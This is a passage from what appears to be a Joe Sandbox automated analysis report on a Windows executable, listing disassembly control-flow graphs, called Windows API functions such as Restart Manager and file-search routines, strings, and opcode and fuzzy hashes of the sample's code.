                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                            • API String ID: 2252812187-1888249752
                                                                            • Opcode ID: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                                            • Instruction ID: 1c76bb1748f4203a7925b196b2d5623075850b54fd141b793a49aa5c8bf5bf77
                                                                            • Opcode Fuzzy Hash: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                                            • Instruction Fuzzy Hash: 22517571B44615EEEB10EAE6A842BBF7BACDB09304F9404BBB501F7282D57C9904867D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1610 4502ac-4502b9 1611 4502bf-4502cc GetVersion 1610->1611 1612 450368-450372 1610->1612 1611->1612 1613 4502d2-4502e8 LoadLibraryA 1611->1613 1613->1612 1614 4502ea-450363 GetProcAddress * 6 1613->1614 1614->1612
                                                                            APIs
                                                                            • GetVersion.KERNEL32(00480618), ref: 004502BF
                                                                            • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480618), ref: 004502D7
                                                                            • GetProcAddress.KERNEL32(70220000,RmStartSession), ref: 004502F5
                                                                            • GetProcAddress.KERNEL32(70220000,RmRegisterResources), ref: 0045030A
                                                                            • GetProcAddress.KERNEL32(70220000,RmGetList), ref: 0045031F
                                                                            • GetProcAddress.KERNEL32(70220000,RmShutdown), ref: 00450334
                                                                            • GetProcAddress.KERNEL32(70220000,RmRestart), ref: 00450349
                                                                            • GetProcAddress.KERNEL32(70220000,RmEndSession), ref: 0045035E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                            • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                            • API String ID: 1968650500-3419246398
                                                                            • Opcode ID: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                                            • Instruction ID: 1cbd638475316f18669290cc5db137bdc69b0bbe350ace6e5bf0246856dda450
                                                                            • Opcode Fuzzy Hash: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                                            • Instruction Fuzzy Hash: CC11A5B4541740DBDA10FBA5BB85A2A32E9E72C715B08563BEC44AA1A2DB7C4448CF9C

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1674 423c1c-423c50 1675 423c52-423c53 1674->1675 1676 423c84-423c9b call 423b78 1674->1676 1678 423c55-423c71 call 40b44c 1675->1678 1681 423cfc-423d01 1676->1681 1682 423c9d 1676->1682 1699 423c73-423c7b 1678->1699 1700 423c80-423c82 1678->1700 1684 423d03 1681->1684 1685 423d37-423d3c 1681->1685 1686 423ca3-423ca6 1682->1686 1687 423d60-423d70 1682->1687 1688 423fc1-423fc9 1684->1688 1689 423d09-423d11 1684->1689 1692 423d42-423d45 1685->1692 1693 4240aa-4240b8 IsIconic 1685->1693 1690 423cd5-423cd8 1686->1690 1691 423ca8 1686->1691 1694 423d72-423d77 1687->1694 1695 423d7b-423d83 call 4241a4 1687->1695 1704 424162-42416a 1688->1704 1710 423fcf-423fda call 4181f0 1688->1710 1702 423f23-423f4a SendMessageA 1689->1702 1703 423d17-423d1c 1689->1703 1711 423db9-423dc0 1690->1711 1712 423cde-423cdf 1690->1712 1706 423e06-423e16 call 423b94 1691->1706 1707 423cae-423cb1 1691->1707 1708 4240e6-4240fb call 424860 1692->1708 1709 423d4b-423d4c 1692->1709 1693->1704 1705 4240be-4240c9 GetFocus 1693->1705 1697 423d88-423d90 call 4241ec 1694->1697 1698 423d79-423d9c call 423b94 1694->1698 1695->1704 1697->1704 1698->1704 1714 424181-424187 1699->1714 1700->1676 1700->1678 1702->1704 1725 423d22-423d23 1703->1725 1726 42405a-424065 1703->1726 1704->1714 1705->1704 1717 4240cf-4240d8 call 41f004 1705->1717 1706->1704 1718 423cb7-423cba 1707->1718 1719 423e2e-423e4a PostMessageA call 423b94 1707->1719 1708->1704 1728 423d52-423d55 1709->1728 1729 4240fd-424104 1709->1729 1710->1704 1761 423fe0-423fef call 4181f0 IsWindowEnabled 1710->1761 1711->1704 1722 423dc6-423dcd 1711->1722 1723 423ce5-423ce8 1712->1723 1724 423f4f-423f56 1712->1724 1717->1704 1773 4240de-4240e4 SetFocus 1717->1773 1735 423cc0-423cc3 1718->1735 1736 423eb5-423ebc 1718->1736 1719->1704 1722->1704 1741 423dd3-423dd9 1722->1741 1742 423cee-423cf1 1723->1742 1743 423e4f-423e6f call 423b94 1723->1743 1724->1704 1731 423f5c-423f61 call 404e54 1724->1731 1744 424082-42408d 1725->1744 1745 423d29-423d2c 1725->1745 1726->1704 1747 42406b-42407d 1726->1747 1748 424130-424137 1728->1748 1749 423d5b 1728->1749 1738 424106-424119 call 4244e4 1729->1738 1739 42411b-42412e call 42453c 1729->1739 1731->1704 1756 423cc9-423cca 1735->1756 1757 423dde-423dec IsIconic 1735->1757 1758 423ebe-423ed1 call 423b24 1736->1758 1759 423eef-423f00 call 423b94 1736->1759 1738->1704 1739->1704 1741->1704 1762 423cf7 1742->1762 1763 423e1b-423e29 call 424188 1742->1763 1788 423e93-423eb0 call 423a94 PostMessageA 1743->1788 1789 423e71-423e8e call 423b24 PostMessageA 1743->1789 1744->1704 1750 424093-4240a5 1744->1750 1767 423d32 1745->1767 1768 423f66-423f6e 1745->1768 1747->1704 1765 42414a-424159 1748->1765 1766 424139-424148 1748->1766 1769 42415b-42415c call 423b94 1749->1769 1750->1704 1774 423cd0 1756->1774 1775 423da1-423da9 1756->1775 1781 423dfa-423e01 call 423b94 1757->1781 1782 423dee-423df5 call 423bd0 1757->1782 1803 423ee3-423eea call 423b94 1758->1803 1804 423ed3-423edd call 41ef68 1758->1804 1808 423f02-423f08 call 41eeb4 1759->1808 1809 423f16-423f1e call 423a94 1759->1809 1761->1704 1805 423ff5-424004 call 4181f0 IsWindowVisible 1761->1805 1762->1769 1763->1704 1765->1704 1766->1704 1767->1769 1768->1704 1772 423f74-423f7b 1768->1772 1797 424161 1769->1797 1772->1704 1790 423f81-423f90 call 4181f0 IsWindowEnabled 1772->1790 1773->1704 1774->1769 1775->1704 1791 423daf-423db4 call 422c5c 1775->1791 1781->1704 1782->1704 1788->1704 1789->1704 1790->1704 1819 423f96-423fac call 412320 1790->1819 1791->1704 1797->1704 1803->1704 1804->1803 1805->1704 1826 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 1805->1826 1823 423f0d-423f10 1808->1823 1809->1704 1819->1704 1829 423fb2-423fbc 1819->1829 1823->1809 1826->1704 1829->1704
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                                            • Instruction ID: adb1057a9d0d7329e5210459a6b6756db00cf693e958207d3a560887342e2c6b
                                                                            • Opcode Fuzzy Hash: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                                            • Instruction Fuzzy Hash: EBE1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE81DB08

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1989 467710-467726 1990 467730-4677e7 call 49514c call 402b30 * 6 1989->1990 1991 467728-46772b call 402d30 1989->1991 2008 467824-46783d 1990->2008 2009 4677e9-467810 call 41464c 1990->2009 1991->1990 2015 46783f-467866 call 41462c 2008->2015 2016 46787a-467888 call 495454 2008->2016 2013 467815-46781f call 41460c 2009->2013 2014 467812 2009->2014 2013->2008 2014->2013 2022 46786b-467875 call 4145ec 2015->2022 2023 467868 2015->2023 2024 46788a-467899 call 49529c 2016->2024 2025 46789b-46789d call 4953c0 2016->2025 2022->2016 2023->2022 2030 4678a2-4678f5 call 494db0 call 41a3e0 * 2 2024->2030 2025->2030 2037 467906-46791b call 451444 call 414b28 2030->2037 2038 4678f7-467904 call 414b28 2030->2038 2043 467920-467927 2037->2043 2038->2043 2045 46796f-467df5 call 4951ec call 495510 call 41462c * 3 call 4146cc call 4145ec * 3 call 460f68 call 460f80 call 460f8c call 460fd4 call 460f68 call 460f80 call 460f8c call 460fd4 call 460f80 call 460fd4 LoadBitmapA call 41d6c0 call 460fa4 call 460fbc call 4674ec call 469000 call 466b6c call 40357c call 414b28 call 466ea4 call 466eac call 466b6c call 40357c * 2 call 414b28 call 469000 call 466b6c call 414b28 call 466ea4 call 466eac call 414b28 * 2 call 469000 call 414b28 * 2 call 466ea4 call 41460c call 466ea4 call 41460c call 469000 call 414b28 call 466ea4 call 466eac call 469000 call 414b28 call 466ea4 call 41460c * 2 call 414b28 call 466ea4 call 41460c 2043->2045 2046 467929-46796a call 4146cc call 414710 call 420fa8 call 420fd4 call 420b78 call 420ba4 2043->2046 2176 467df7-467e4f call 41460c call 414b28 call 466ea4 call 41460c 2045->2176 2177 467e51-467e6a call 414a54 * 2 2045->2177 2046->2045 2185 467e6f-467f20 call 466b6c call 469000 call 466b6c call 414b28 call 495510 call 466ea4 2176->2185 2177->2185 2203 467f22-467f3d 2185->2203 2204 467f5a-468190 call 466b6c call 414b28 call 495520 * 2 call 42e8d0 call 41460c call 466ea4 call 41460c call 4181f0 call 42ed48 call 414b28 call 4951ec call 495510 call 41462c call 466b6c call 414b28 call 466ea4 call 41460c call 466b6c call 469000 call 466b6c call 414b28 call 466ea4 call 41460c call 466eac call 466b6c call 414b28 call 466ea4 2185->2204 2205 467f42-467f55 call 41460c 2203->2205 2206 467f3f 2203->2206 2265 468192-46819b 2204->2265 2266 4681d1-46828a call 466b6c call 469000 call 466b6c call 414b28 call 495510 call 466ea4 2204->2266 2205->2204 2206->2205 2265->2266 2267 46819d-4681cc call 414a54 call 466eac 2265->2267 2284 4682c4-4686e5 call 466b6c call 414b28 call 495520 * 2 call 42e8d0 call 41460c call 466ea4 call 41460c call 414b28 call 4951ec call 495510 call 41462c call 414b28 call 466b6c call 469000 call 466b6c call 414b28 call 466ea4 call 466eac call 42bbe0 call 495520 call 44e8c0 call 466b6c call 469000 call 466b6c call 469000 call 466b6c call 469000 * 2 call 414b28 call 466ea4 call 466eac call 469000 call 494db0 call 41a3e0 call 466b6c call 40357c call 414b28 call 466ea4 call 41460c call 414b28 * 2 call 495520 call 403494 call 40357c * 2 call 414b28 2266->2284 2285 46828c-4682a7 2266->2285 2267->2266 2384 4686e7-468704 call 44ffc8 call 450124 2284->2384 2385 468709-468710 2284->2385 2287 4682ac-4682bf call 41460c 2285->2287 2288 4682a9 2285->2288 2287->2284 2288->2287 2384->2385 2387 468734-46873b 2385->2387 2388 468712-46872f call 44ffc8 call 450124 2385->2388 2391 46875f-4687a5 call 4181f0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 4690f4 2387->2391 2392 46873d-46875a call 44ffc8 call 450124 2387->2392 2388->2387 2405 4687a7-4687ae 2391->2405 2406 4687bf 2391->2406 2392->2391 2407 4687b0-4687b9 2405->2407 2408 4687bb-4687bd 2405->2408 2409 4687c1-4687d0 2406->2409 2407->2406 2407->2408 2408->2409 2410 4687d2-4687d9 2409->2410 2411 4687ea 2409->2411 2413 4687e6-4687e8 2410->2413 2414 4687db-4687e4 2410->2414 2412 4687ec-468806 2411->2412 2415 4688af-4688b6 2412->2415 2416 46880c-468815 2412->2416 2413->2412 2414->2411 2414->2413 2419 4688bc-4688df call 47bfd8 call 403450 2415->2419 2420 468949-468957 call 414b28 2415->2420 2417 468817-46886e call 47bfd8 call 414b28 call 47bfd8 call 414b28 call 47bfd8 call 414b28 2416->2417 2418 468870-4688aa call 414b28 * 3 2416->2418 2417->2415 2418->2415 2443 4688f0-468904 call 403494 2419->2443 2444 4688e1-4688ee call 47c178 2419->2444 2428 46895c-468965 2420->2428 2432 468a75-468aa4 call 42b97c call 44e84c 2428->2432 2433 46896b-468983 call 429fe8 2428->2433 2462 468b52-468b56 2432->2462 2463 468aaa-468aae 2432->2463 2445 468985-468989 2433->2445 2446 4689fa-4689fe 2433->2446 2458 468916-468947 call 42c814 call 42cbd0 call 403494 call 414b28 2443->2458 2459 468906-468911 call 403494 2443->2459 2444->2458 2454 46898b-4689c5 call 40b44c call 47bfd8 2445->2454 2452 468a00-468a09 2446->2452 2453 468a4e-468a52 2446->2453 2452->2453 2460 468a0b-468a16 2452->2460 2465 468a66-468a70 call 42a06c 2453->2465 2466 468a54-468a64 call 42a06c 2453->2466 2519 4689c7-4689ce 2454->2519 2520 4689f4-4689f8 2454->2520 2458->2428 2459->2458 2460->2453 2470 468a18-468a1c 2460->2470 2473 468bd5-468bd9 2462->2473 2474 468b58-468b5f 2462->2474 2472 468ab0-468ac2 call 40b44c 2463->2472 2465->2432 2466->2432 2478 468a1e-468a41 call 40b44c call 406acc 2470->2478 2497 468af4-468b2b call 47bfd8 call 44cb1c 2472->2497 2498 468ac4-468af2 call 47bfd8 call 44cbec 2472->2498 2481 468c42-468c4b 2473->2481 2482 468bdb-468bf2 call 40b44c 2473->2482 2474->2473 2483 468b61-468b68 2474->2483 2529 468a43-468a46 2478->2529 2530 468a48-468a4c 2478->2530 2490 468c4d-468c65 call 40b44c call 469d68 2481->2490 2491 468c6a-468c7f call 46724c call 466fc8 2481->2491 2511 468bf4-468c30 call 40b44c call 469d68 * 2 call 469c08 2482->2511 2512 468c32-468c40 call 469d68 2482->2512 2483->2473 2493 468b6a-468b75 2483->2493 2490->2491 2538 468cd1-468cdb call 414a54 2491->2538 2539 468c81-468ca4 call 42a050 call 40b44c 2491->2539 2493->2491 2501 468b7b-468b7f 2493->2501 2540 468b30-468b34 2497->2540 2498->2540 2513 468b81-468b97 call 40b44c 2501->2513 2511->2491 2512->2491 2536 468bca-468bce 2513->2536 2537 468b99-468bc5 call 42a06c call 469d68 call 469c08 2513->2537 2519->2520 2531 4689d0-4689e2 call 406acc 2519->2531 2520->2446 2520->2454 2529->2453 2530->2453 2530->2478 2531->2520 2557 4689e4-4689ee 2531->2557 2536->2513 2550 468bd0 2536->2550 2537->2491 2552 468ce0-468cff call 414a54 2538->2552 2571 468ca6-468cad 2539->2571 2572 468caf-468cbe call 414a54 2539->2572 2548 468b36-468b3d 2540->2548 2549 468b3f-468b41 2540->2549 2548->2549 2556 468b48-468b4c 2548->2556 2549->2556 2550->2491 2567 468d01-468d24 call 42a050 call 469ec8 2552->2567 2568 468d29-468d4c call 47bfd8 call 403450 2552->2568 2556->2462 2556->2472 2557->2520 2562 4689f0 2557->2562 2562->2520 2567->2568 2586 468d4e-468d57 2568->2586 2587 468d68-468d71 2568->2587 2571->2572 2576 468cc0-468ccf call 414a54 2571->2576 2572->2552 2576->2552 2586->2587 2590 468d59-468d66 call 47c178 2586->2590 2588 468d87-468d97 call 403494 2587->2588 2589 468d73-468d85 call 403684 2587->2589 2597 468da9-468dc0 call 414b28 2588->2597 2589->2588 2598 468d99-468da4 call 403494 2589->2598 2590->2597 2602 468df6-468e00 call 414a54 2597->2602 2603 468dc2-468dc9 2597->2603 2598->2597 2608 468e05-468e2a call 403400 * 3 2602->2608 2605 468dd6-468de0 call 42b0f4 2603->2605 2606 468dcb-468dd4 2603->2606 2609 468de5-468df4 call 414a54 2605->2609 2606->2605 2606->2609 2609->2608
                                                                            APIs
                                                                              • Part of subcall function 0049529C: GetWindowRect.USER32(00000000), ref: 004952B2
                                                                            • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467ADF
                                                                              • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00467AF9), ref: 0041D6EB
                                                                              • Part of subcall function 004674EC: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                                              • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                                              • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                                              • Part of subcall function 00466EAC: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                                              • Part of subcall function 00495520: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 0049552A
                                                                              • Part of subcall function 0042ED48: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                              • Part of subcall function 0042ED48: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                                              • Part of subcall function 004951EC: 7427A570.USER32(00000000,?,?,?), ref: 0049520E
                                                                              • Part of subcall function 004951EC: SelectObject.GDI32(?,00000000), ref: 00495234
                                                                              • Part of subcall function 004951EC: 7427A480.USER32(00000000,?,00495292,0049528B,?,00000000,?,?,?), ref: 00495285
                                                                              • Part of subcall function 00495510: MulDiv.KERNEL32(0000004B,?,00000006), ref: 0049551A
                                                                            • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,02149D8C,0214B978,?,?,0214B9A8,?,?,0214B9F8,?), ref: 00468769
                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046877A
                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468792
                                                                              • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$7427AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                            • String ID: $(Default)$STOPIMAGE$k H
                                                                            • API String ID: 3514242501-4041106330
                                                                            • Opcode ID: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                                            • Instruction ID: 2b4e5e33b1fbe28ecfb2af168a793b611adbc31a6fcb8730d9662ddd01b2079a
                                                                            • Opcode Fuzzy Hash: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                                            • Instruction Fuzzy Hash: 6CF2C7386005208FCB00EB59D9D9F9973F5BF49304F1582BAF5049B36ADB74AC46CB9A
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 00475251
                                                                            • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047532E
                                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047533C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID: unins$unins???.*
                                                                            • API String ID: 3541575487-1009660736
                                                                            • Opcode ID: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                                            • Instruction ID: 9ba6e551af2be01ae54f2bf6d4feb37662207b66b60327addd096aea054bc42d
                                                                            • Opcode Fuzzy Hash: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                                            • Instruction Fuzzy Hash: 333153706005489FDB10EB65D981ADE77B9EF44344F5080F6A80CAB3B2DBB89F418B58
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A89
                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A91
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileFindFirstLast
                                                                            • String ID:
                                                                            • API String ID: 873889042-0
                                                                            • Opcode ID: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                                            • Instruction ID: 2517da8cadb6fb7e7a3bde91136fc32a544ec95f0d2c756002249f4fd287b9db
                                                                            • Opcode Fuzzy Hash: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                                            • Instruction Fuzzy Hash: B9F0F971A04604AB8B20DBA69D0149EB7ACEB46725710467BFC14E3292EAB94E048558
                                                                            APIs
                                                                            • GetVersion.KERNEL32(?,0046E422), ref: 0046E396
                                                                            • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E422), ref: 0046E3B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstanceVersion
                                                                            • String ID:
                                                                            • API String ID: 1462612201-0
                                                                            • Opcode ID: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                                            • Instruction ID: ca204bcfc643a6eeda20b237376823326e775e7ff9cf44b6f5c5a065e078b710
                                                                            • Opcode Fuzzy Hash: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                                            • Instruction Fuzzy Hash: 80F0A035282200DEEB1097AADC45B4A37C1BB20718F40007BF440D7391E3FDD8908A5F
                                                                            APIs
                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                            • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                            • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                            • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                            APIs
                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                            • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                            • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                            • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                            APIs
                                                                            Memory Dump Source
